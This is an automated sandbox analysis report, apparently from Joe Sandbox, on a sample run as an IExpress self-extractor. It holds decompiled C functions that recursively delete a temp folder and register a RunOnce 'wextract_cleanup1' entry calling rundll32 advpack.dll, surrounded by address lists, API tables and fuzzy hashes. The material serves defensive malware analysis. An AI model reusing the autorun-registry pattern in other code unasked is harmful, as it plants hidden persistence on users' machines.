                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            0x00322398
                                                                                                                                                                                                                                            0x0032239e
                                                                                                                                                                                                                                            0x003223a3
                                                                                                                                                                                                                                            0x003223a5
                                                                                                                                                                                                                                            0x003223ae
                                                                                                                                                                                                                                            0x003223b3
                                                                                                                                                                                                                                            0x003224cb
                                                                                                                                                                                                                                            0x003224d2
                                                                                                                                                                                                                                            0x003224d3
                                                                                                                                                                                                                                            0x003224d4
                                                                                                                                                                                                                                            0x003224df
                                                                                                                                                                                                                                            0x003223c2
                                                                                                                                                                                                                                            0x003223d1
                                                                                                                                                                                                                                            0x003223db
                                                                                                                                                                                                                                            0x003223e4
                                                                                                                                                                                                                                            0x003223f6
                                                                                                                                                                                                                                            0x003223fc
                                                                                                                                                                                                                                            0x00322401
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322407
                                                                                                                                                                                                                                            0x00322407
                                                                                                                                                                                                                                            0x00322408
                                                                                                                                                                                                                                            0x00322411
                                                                                                                                                                                                                                            0x0032241f
                                                                                                                                                                                                                                            0x0032247a
                                                                                                                                                                                                                                            0x00322483
                                                                                                                                                                                                                                            0x00322495
                                                                                                                                                                                                                                            0x003224a3
                                                                                                                                                                                                                                            0x00322421
                                                                                                                                                                                                                                            0x0032242f
                                                                                                                                                                                                                                            0x00322453
                                                                                                                                                                                                                                            0x0032245d
                                                                                                                                                                                                                                            0x00322466
                                                                                                                                                                                                                                            0x00322472
                                                                                                                                                                                                                                            0x00322472
                                                                                                                                                                                                                                            0x0032242f
                                                                                                                                                                                                                                            0x003224af
                                                                                                                                                                                                                                            0x003224b5
                                                                                                                                                                                                                                            0x003224be
                                                                                                                                                                                                                                            0x003224c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003224c5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00328A3A,003211F4,00328A3A,00000000,?,?), ref: 003223F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,003211F8), ref: 00322427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,003211FC), ref: 0032243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00322495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 003224A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003224AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 003224BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00328A3A), ref: 003224C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 007c67cf830b41f889024187bb03e9f4b1a73b2d085f17b0a6b72d5e9acdb840
                                                                                                                                                                                                                                            • Instruction ID: 60b72e2dde82b7ccafd5927f7db1981b88944f394324aec508d99f5ed4d058ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 007c67cf830b41f889024187bb03e9f4b1a73b2d085f17b0a6b72d5e9acdb840
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A31A131204B50ABC332EF64ED8AAEF73ACAFC4315F05492DF95586290EB74A90DC752
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00322BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0x32a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0x329124 = 0;
                                                                                                                                                                                                                                            				if(E00322CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00322F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E003252B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0x328a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0x329a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00321F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0x328588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0x329124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00322c03
                                                                                                                                                                                                                                            0x00322c0d
                                                                                                                                                                                                                                            0x00322c18
                                                                                                                                                                                                                                            0x00322c20
                                                                                                                                                                                                                                            0x00322c2e
                                                                                                                                                                                                                                            0x00322c32
                                                                                                                                                                                                                                            0x00322c36
                                                                                                                                                                                                                                            0x00322c3d
                                                                                                                                                                                                                                            0x00322c43
                                                                                                                                                                                                                                            0x00322c45
                                                                                                                                                                                                                                            0x00322c47
                                                                                                                                                                                                                                            0x00322c49
                                                                                                                                                                                                                                            0x00322c4e
                                                                                                                                                                                                                                            0x00322c4e
                                                                                                                                                                                                                                            0x00322c47
                                                                                                                                                                                                                                            0x00322c32
                                                                                                                                                                                                                                            0x00322c20
                                                                                                                                                                                                                                            0x00322c50
                                                                                                                                                                                                                                            0x00322c54
                                                                                                                                                                                                                                            0x00322c57
                                                                                                                                                                                                                                            0x00322c64
                                                                                                                                                                                                                                            0x00322c66
                                                                                                                                                                                                                                            0x00322c6b
                                                                                                                                                                                                                                            0x00322c6d
                                                                                                                                                                                                                                            0x00322c74
                                                                                                                                                                                                                                            0x00322c76
                                                                                                                                                                                                                                            0x00322c7c
                                                                                                                                                                                                                                            0x00322c7e
                                                                                                                                                                                                                                            0x00322c87
                                                                                                                                                                                                                                            0x00322c89
                                                                                                                                                                                                                                            0x00322c89
                                                                                                                                                                                                                                            0x00322c87
                                                                                                                                                                                                                                            0x00322c7c
                                                                                                                                                                                                                                            0x00322c74
                                                                                                                                                                                                                                            0x00322c8e
                                                                                                                                                                                                                                            0x00322c95
                                                                                                                                                                                                                                            0x00322c98
                                                                                                                                                                                                                                            0x00322c98
                                                                                                                                                                                                                                            0x00322c9e
                                                                                                                                                                                                                                            0x00322ca7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00326BB0,00320000,00000000,00000002,0000000A), ref: 00322C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00326BB0,00320000,00000000,00000002,0000000A), ref: 00322C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00322C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00326BB0,00320000,00000000,00000002,0000000A), ref: 00322C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 4f563d763d827e61d71407d36b674a1ad995c47a7012af707a0df6eb888d2693
                                                                                                                                                                                                                                            • Instruction ID: 27cfaf240128807d1b63cc38ba8e910838f4b2d6cc279e70772a42bdb5a749d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f563d763d827e61d71407d36b674a1ad995c47a7012af707a0df6eb888d2693
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E11EC71600335BFC7336BB5BD89B6F376D9B887A0F060429F804E7290CA30DC128662
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00326F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00326EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00326f45
                                                                                                                                                                                                                                            0x00326f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00326F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: 7ef89433e3e103df00e4b266c2565c2efced2100ff88e30b50883d4465de2d45
                                                                                                                                                                                                                                            • Instruction ID: 41def29e19dc96d05f1a693de87a8ab6a03e425b49cd49e04d46b843a3496e90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ef89433e3e103df00e4b266c2565c2efced2100ff88e30b50883d4465de2d45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F490027425155047A6221B70AE1A45575995F5D753F825464E011C4494DB7050515512
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E0032202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00326CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E0032171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E0032658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x329a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0x3291e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3291e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0x328580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            							E0032171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E003244B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E0032658A( &_v268, 0x104, 0x321140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0x328530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x0032202a
                                                                                                                                                                                                                                            0x00322035
                                                                                                                                                                                                                                            0x0032203c
                                                                                                                                                                                                                                            0x00322041
                                                                                                                                                                                                                                            0x00322050
                                                                                                                                                                                                                                            0x0032205f
                                                                                                                                                                                                                                            0x00322064
                                                                                                                                                                                                                                            0x0032206f
                                                                                                                                                                                                                                            0x0032208c
                                                                                                                                                                                                                                            0x00322094
                                                                                                                                                                                                                                            0x00322257
                                                                                                                                                                                                                                            0x00322266
                                                                                                                                                                                                                                            0x00322266
                                                                                                                                                                                                                                            0x0032209a
                                                                                                                                                                                                                                            0x0032209b
                                                                                                                                                                                                                                            0x0032209d
                                                                                                                                                                                                                                            0x003220aa
                                                                                                                                                                                                                                            0x003220af
                                                                                                                                                                                                                                            0x003220c9
                                                                                                                                                                                                                                            0x003220d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003220d3
                                                                                                                                                                                                                                            0x003220da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003220da
                                                                                                                                                                                                                                            0x003220e2
                                                                                                                                                                                                                                            0x00322103
                                                                                                                                                                                                                                            0x0032210e
                                                                                                                                                                                                                                            0x00322116
                                                                                                                                                                                                                                            0x00322122
                                                                                                                                                                                                                                            0x00322128
                                                                                                                                                                                                                                            0x0032212c
                                                                                                                                                                                                                                            0x00322179
                                                                                                                                                                                                                                            0x00322194
                                                                                                                                                                                                                                            0x003221de
                                                                                                                                                                                                                                            0x003221e4
                                                                                                                                                                                                                                            0x00322256
                                                                                                                                                                                                                                            0x00322256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322256
                                                                                                                                                                                                                                            0x00322196
                                                                                                                                                                                                                                            0x00322196
                                                                                                                                                                                                                                            0x0032219c
                                                                                                                                                                                                                                            0x0032219f
                                                                                                                                                                                                                                            0x0032219f
                                                                                                                                                                                                                                            0x003221a1
                                                                                                                                                                                                                                            0x003221a2
                                                                                                                                                                                                                                            0x003221a6
                                                                                                                                                                                                                                            0x003221a8
                                                                                                                                                                                                                                            0x003221b0
                                                                                                                                                                                                                                            0x003221b0
                                                                                                                                                                                                                                            0x003221b2
                                                                                                                                                                                                                                            0x003221b3
                                                                                                                                                                                                                                            0x003221bc
                                                                                                                                                                                                                                            0x003221c7
                                                                                                                                                                                                                                            0x003221cb
                                                                                                                                                                                                                                            0x003221f1
                                                                                                                                                                                                                                            0x003221f6
                                                                                                                                                                                                                                            0x003221fd
                                                                                                                                                                                                                                            0x003221ff
                                                                                                                                                                                                                                            0x003221ff
                                                                                                                                                                                                                                            0x00322204
                                                                                                                                                                                                                                            0x00322213
                                                                                                                                                                                                                                            0x00322218
                                                                                                                                                                                                                                            0x0032221d
                                                                                                                                                                                                                                            0x0032221d
                                                                                                                                                                                                                                            0x00322220
                                                                                                                                                                                                                                            0x00322220
                                                                                                                                                                                                                                            0x00322222
                                                                                                                                                                                                                                            0x00322223
                                                                                                                                                                                                                                            0x00322229
                                                                                                                                                                                                                                            0x0032223d
                                                                                                                                                                                                                                            0x00322249
                                                                                                                                                                                                                                            0x00322250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322250
                                                                                                                                                                                                                                            0x003221d2
                                                                                                                                                                                                                                            0x003221d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003221d9
                                                                                                                                                                                                                                            0x0032213a
                                                                                                                                                                                                                                            0x00322141
                                                                                                                                                                                                                                            0x00322144
                                                                                                                                                                                                                                            0x0032214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322163
                                                                                                                                                                                                                                            0x00322172
                                                                                                                                                                                                                                            0x00322172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322163
                                                                                                                                                                                                                                            0x003220ea
                                                                                                                                                                                                                                            0x003220f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00322050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0032205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0032208C
                                                                                                                                                                                                                                              • Part of subcall function 0032171E: _vsnprintf.MSVCRT ref: 00321750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003220C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003220EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00322103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00322134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 0032215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0032218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003221C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003221E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0032223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
